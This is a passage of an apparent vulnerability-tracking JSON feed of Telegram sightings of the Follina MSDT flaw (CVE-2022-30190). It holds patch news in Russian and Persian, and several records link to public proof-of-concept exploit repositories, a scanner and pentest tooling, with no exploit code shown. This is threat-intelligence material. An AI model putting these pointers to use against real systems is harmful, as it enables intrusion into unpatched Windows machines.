It is a debugger designed for analyzing, fuzzing and reversing.\n\nhttps://github.com/HyperDbg/HyperDbg\n\nssc-reading-list\n\nA reading list for software supply-chain security.\n\nhttps://github.com/chainguard-dev/ssc-reading-list\n\n\u200bArsenal\n\nJust a quick inventory, reminder and launcher for pentest commands.\n\nThis project written by pentesters for pentesters simplify the use of all the hard-to-remember commands\n\nhttps://github.com/Orange-Cyberdefense/arsenal\n\n#pentesting #redteam", "creation_timestamp": "2023-04-04T11:31:24.000000Z"}, {"uuid": "62e403c9-8fbf-41f4-86c4-a36b4867c731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/vPwnd/19273", "content": "MSDT ZERO-DAY\n\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T03:37:08.000000Z"}, {"uuid": "72648e20-dba1-47ee-8390-cbb5d5eeead4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/tUEHTxaKBSTU2Y5sSCh7GbBw134FF8IyhyRditgv_Jo14H8", "content": "", "creation_timestamp": "2023-06-16T08:27:34.000000Z"}, {"uuid": "225b04ff-b0d0-4bb0-8047-319bde00b3ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/xytonicweb/124", "content": "Microsoft Office RCE - \u201cFollina\u201d MSDT Attack\n\nCVE-2022-30190\n\nhttps://github.com/JohnHammond/msdt-follina", "creation_timestamp": "2022-06-03T05:48:10.000000Z"}, {"uuid": "aef46227-8dca-4211-a659-c9d86f4948bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": 
"exploited", "source": "https://t.me/breachdetector/91346", "content": "\u26a0 Detectada filtraci\u00f3n \u26a0\n{\n  \"site\": \"Telegram Channel\",\n  \"Threat Actor\": \u201cVPwnd\",\n  \"Content\": \"MSDT ZERO-DAY https://github.com/PwnC00re/PoC-CVE-2022-30190\u201d,\n  \"Detection Date\": \u201c01 Jun 2022 03:36\u201d,\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 Data Leak monitoring system\ud83d\udd39", "creation_timestamp": "2022-06-01T03:42:55.000000Z"}, {"uuid": "62465382-7277-4c29-8d6a-39a2b4c3298a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/8yasABRsBeQ7_fA7ekcVN5-Bf6YalSSK4RwFtvSF2nNKkrM", "content": "", "creation_timestamp": "2022-12-06T17:10:12.000000Z"}, {"uuid": "33dabe3e-82f4-44f4-9533-ad2cfc7fb043", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/vPwnd/492", "content": "MSDT ZERO-DAY\n\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T03:37:08.000000Z"}, {"uuid": "04111029-4633-4839-8210-d669f44c7419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/proxy_bar/1190", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell (CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. 
Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T06:36:16.000000Z"}, {"uuid": "47ae0439-8683-4f4a-ab7a-85fe4c13df11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/-hSjE6tQsby1bK59117CS79M8pJZfwuegK8pW2OS8URrTA", "content": "", "creation_timestamp": "2022-06-06T13:20:17.000000Z"}, {"uuid": "c0f912e3-1479-48b4-8f98-f6a4e13a56c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/V4aMGqbF9E7u6db2vlWqjJ0xbg8yD-1GzjUeht6dlSqLYG8", "content": "", "creation_timestamp": "2022-09-12T05:42:06.000000Z"}, {"uuid": "315722e1-ab02-4876-b2cf-888125a4c800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3009", "content": "\u041f\u043e \u0441\u0442\u0430\u0440\u043e\u0439 \u0434\u043e\u0431\u0440\u043e\u0439 \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u0445 Microsoft \u0437\u0430\u043d\u0438\u043c\u0430\u044e\u0442\u0441\u044f \u0432\u0441\u0435, \u043a\u0440\u043e\u043c\u0435 \u0441\u0430\u043c\u043e\u0439 Microsoft.\n\n0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u0432 Microsoft Windows Support Diagnostic Tool (MSDT), \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a Follina, \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 
\u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0435 \u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0435 0patch. \n\u00a0\n\u041f\u0430\u0442\u0447 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 Windows: Windows 11 v21H2, Windows 10 (\u043e\u0442 v1803 \u0434\u043e v21H2), Windows 7 \u0438 Windows Server 2008 R2\n\n\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0438 \u0443\u0436\u0435 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0435 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435\u0433\u043e \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f.\n\n\u0421\u0430\u043c \u0420\u0435\u0434\u043c\u043e\u043d\u0434 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u0438\u0447\u0435\u0433\u043e, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0448\u0438\u0441\u044c \u043c\u0435\u0440\u0430\u043c\u0438 \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439 \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0430\u0442\u0430\u043a, \u043f\u043e\u0441\u043e\u0432\u0435\u0442\u043e\u0432\u0430\u0432 
\u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u00a0\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 MSDT.\n\n\u041e\u0434\u043d\u0430\u043a\u043e 0patch \u043f\u043e\u0448\u043b\u0438 \u043f\u043e \u0434\u0440\u0443\u0433\u043e\u043c\u0443 \u043f\u0443\u0442\u0438, \u0432\u043c\u0435\u0441\u0442\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u0430 MSDT, \u043e\u043d\u0438 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438\u00a0\u043e\u0447\u0438\u0441\u0442\u043a\u0443 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u043f\u0443\u0442\u0438 (\u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 Windows) \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u043c\u0430\u0441\u0442\u0435\u0440\u0430 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u043a\u0438 Windows \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0432 \u041e\u0421 \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439.\n\n0patch \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f, \u043a\u0430\u043a\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f Office \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u043b\u0438 \u043e\u043d\u0430 
\u0432\u043e\u043e\u0431\u0449\u0435: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e\u00a0\u0434\u0440\u0443\u0433\u0438\u0445 \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u0432 \u0430\u0442\u0430\u043a.\n\n\u0427\u0442\u043e\u0431\u044b \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043c\u0438\u043a\u0440\u043e\u043f\u0430\u0442\u0447 \u0432 Windows \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c 0patch-\u0430\u0433\u0435\u043d\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442 \u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.\n\n\u041e\u0436\u0438\u0434\u0430\u044e\u0449\u0438\u043c \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430 \u043e\u0442 Microsoft \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0438\u0442\u0435\u0440\u0430\u0446\u0438\u0438 (\u043a\u043e\u0433\u0434\u0430 \u043e\u043d \u0432\u044b\u0439\u0434\u0435\u0442), \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u0430\u0442\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0438 \u0434\u043e\u0436\u0434\u0430\u0442\u044c\u0441\u044f \u043d\u043e\u0432\u044b\u0445 \u0434\u0432\u0443\u0445: \u043e\u0434\u0438\u043d \u0438\u0437 \u043d\u0438\u0445 \u0437\u0430\u043a\u0440\u043e\u0435\u0442 \u043e\u0441\u043d\u043e\u0432\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0430 
\u0432\u0442\u043e\u0440\u043e\u0439 - \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u0435\u0442 \u043f\u043e\u0441\u043b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439.", "creation_timestamp": "2022-06-02T11:31:14.000000Z"}, {"uuid": "644bb2d6-9cd4-4455-9e18-12fdb641c76e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/512", "content": "CVE-2022-30190 : Follina Scanner \nhttps://github.com/ErrorNoInternet/FollinaScanner", "creation_timestamp": "2022-10-03T10:30:15.000000Z"}, {"uuid": "9a81379b-b1bf-41ee-aa69-d51555dd6016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/true_secator/3060", "content": "Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 PatchTuesday \u0437\u0430 \u0438\u044e\u043d\u044c 2022, \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0432 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 \u0432\u0434\u043e\u043b\u044c \u0438 \u043f\u043e\u043f\u0435\u0440\u0435\u043a 0-day Follina.\n\n\u0421\u0440\u0435\u0434\u0438 \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0445: 3 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 RCE, 51 
\u043e\u0442\u043c\u0435\u0447\u0435\u043d\u0430 - \u043a\u0430\u043a \u0432\u0430\u0436\u043d\u0430\u044f \u0438 \u043e\u0434\u043d\u0430 - \u043a\u0430\u043a \u0443\u043c\u0435\u0440\u0435\u043d\u043d\u0430\u044f. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e,\u00a0\u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435 Microsoft Edge \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u044b 5 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u041e\u0431\u0449\u0435\u0435 \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c: 12 - \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439; 1 - \u043e\u0431\u0445\u043e\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, 27 - RCE, 11 - \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, 3 - \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438, 1 - \u0441\u043f\u0443\u0444\u0438\u043d\u0433. 
\u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0437\u0434\u0435\u0441\u044c.\n\n\u0413\u043b\u0430\u0432\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u0435\u043c \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043f\u0430\u0442\u0447\u0430 \u0441\u0442\u0430\u043b\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 Follina, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 PowerShell \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c Windows Microsoft Diagnostic Tool (MSDT) \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 Word.\n\n\u041f\u043e\u043c\u0438\u043c\u043e CVE-2022-30190 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u0440\u0443\u0433\u0438\u0445 RCE \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows (CVE-2022-30136), Windows Hyper-V (CVE-2022-30163), Windows Lightweight Directory Access Protocol, Microsoft Office, HEVC \u0438 Azure RTOS GUIX Studio.\n\n\u0415\u0449\u0435 \u043e\u0434\u043d\u0438\u043c \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u043c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u043c 
\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f\u00a0CVE-2022-30147\u00a0(\u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,8), \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u043c \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0435 Windows \u0438 \u0441 \u043e\u0442\u043c\u0435\u0442\u043a\u043e\u0439 Microsoft - \u00ab\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0431\u043e\u043b\u0435\u0435 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u0430\u044f\u00bb.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u0440\u0430\u0434\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0438\u043b\u044c\u043d\u043e \u043d\u0435 \u0441\u0442\u043e\u0438\u0442, \u0432\u0435\u0434\u044c \u043f\u043e\u043c\u043d\u0438\u0442\u044c\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0430\u00a0\u043e\u0447\u0435\u0440\u0435\u0434\u0438\u00a0\u043f\u0435\u0447\u0430\u0442\u0438\u00a0\u0432\u044b\u0445\u043e\u0434\u0438\u043b \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2022 \u0447\u0443\u0442\u044c \u043b\u0438 \u043d\u0435 \u043a\u0430\u0436\u0434\u044b\u0439 \u043c\u0435\u0441\u044f\u0446, \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u043c \u0441\u0442\u0430\u043b \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u0430\u0442\u0447, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0434\u043e\u0431\u0438\u043b\u0438 \u0431\u0430\u0433\u0443. 
\u041d\u043e \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043d\u0435 \u0444\u0430\u043a\u0442.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, Microsoft \u0432 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0440\u0430\u0437 \u043e\u0431\u043b\u0430\u0436\u0430\u043b\u0438\u0441\u044c: \u0435\u0441\u043b\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0437\u0430\u043d\u044f\u043b\u043e 2 \u043d\u0435\u0434\u0435\u043b\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438, \u0442\u043e\u0433\u0434\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0432\u043e\u043f\u0440\u043e\u0441, \u0430 \u043f\u043e\u0447\u0435\u043c\u0443 \u043e\u043d\u043e \u043d\u0435 \u0432\u044b\u0448\u043b\u043e \u0440\u0430\u043d\u044c\u0448\u0435, \u0432\u0435\u0434\u044c \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0435\u0449\u0435 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435. 
\u041d\u043e \u043e\u0442\u0432\u0435\u0442 \u0432\u044b \u0443\u0436\u0435 \u0437\u043d\u0430\u0435\u0442\u0435.", "creation_timestamp": "2022-06-15T16:10:07.000000Z"}, {"uuid": "8ad1605e-5738-425d-acc6-dacc72612279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/190", "content": "\u0647\u0634\u062f\u0627\u0631!\n\n\u0646\u0648\u0628\u062a\u06cc \u0647\u0645 \u0628\u0627\u0634\u0647 \u0627\u06cc\u0646 \u0628\u0627\u0631 \u0646\u0648\u0628\u062a \u0645\u0627\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\u0650!\n\n\u0631\u0648\u0632 \u06af\u0630\u0634\u062a\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0647\u0645 \u062f\u06cc\u06af\u0631\u06cc \u062f\u0631 \u0627\u0628\u0632\u0627\u0631 Diagnosis \u0648\u06cc\u0646\u062f\u0648\u0632 \u0645\u0628\u062a\u06cc \u0628\u0631 \u0634\u0646\u0627\u0633\u0647 CVE-2022-30190 \u062a\u0648\u0633\u0637 \u0628\u062e\u0634 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a\u060c \u062e\u0628\u0631\u0633\u0627\u0632 \u0634\u062f.\n\u0627\u06cc\u0646 \u0636\u0639\u0641 \u0627\u0645\u0646\u06cc\u062a\u06cc \u06a9\u0647 \u0628\u0647 \"Follina\" \u0645\u0639\u0631\u0648\u0641 \u0627\u0633\u062a \u062f\u0631 \u0627\u0628\u0632\u0627\u0631 MSDT \u06cc\u0627 Diagnostic Tools \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u06a9\u0627\u0647\u0634 \u062e\u0637\u0631 \u0648 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0641\u0646\u06cc \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631 \u0627\u06cc\u0646 \u062e\u0635\u0648\u0635 \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u0644\u06cc\u0646\u06a9 \u0631\u0633\u0645\u06cc \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a \u0645\u0631\u0627\u062c\u0639\u0647 
\u0646\u0645\u0627\u06cc\u06cc\u062f.\n\u062c\u0632\u0626\u06cc\u0627\u062a \u0631\u0633\u0645\u06cc: https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "creation_timestamp": "2022-05-31T20:54:26.000000Z"}, {"uuid": "5e064c8f-2fe2-4e15-869a-55709df96bd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/true_secator/3129", "content": "\u041d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u044c \u043d\u0430 \u0442\u0435 \u0436\u0435 \u0433\u0440\u0430\u0431\u043b\u0438 \u0432 \u043c\u0438\u0440\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 - \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u0430\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0430, \u0430 \u201c\u043b\u0430\u0442\u0430\u0442\u044c \u0434\u044b\u0440\u044b\u201d \u043f\u043e\u0440\u043e\u0439, \u0441\u0442\u043e\u0438\u0442 \u0431\u043e\u043b\u0435\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e. 
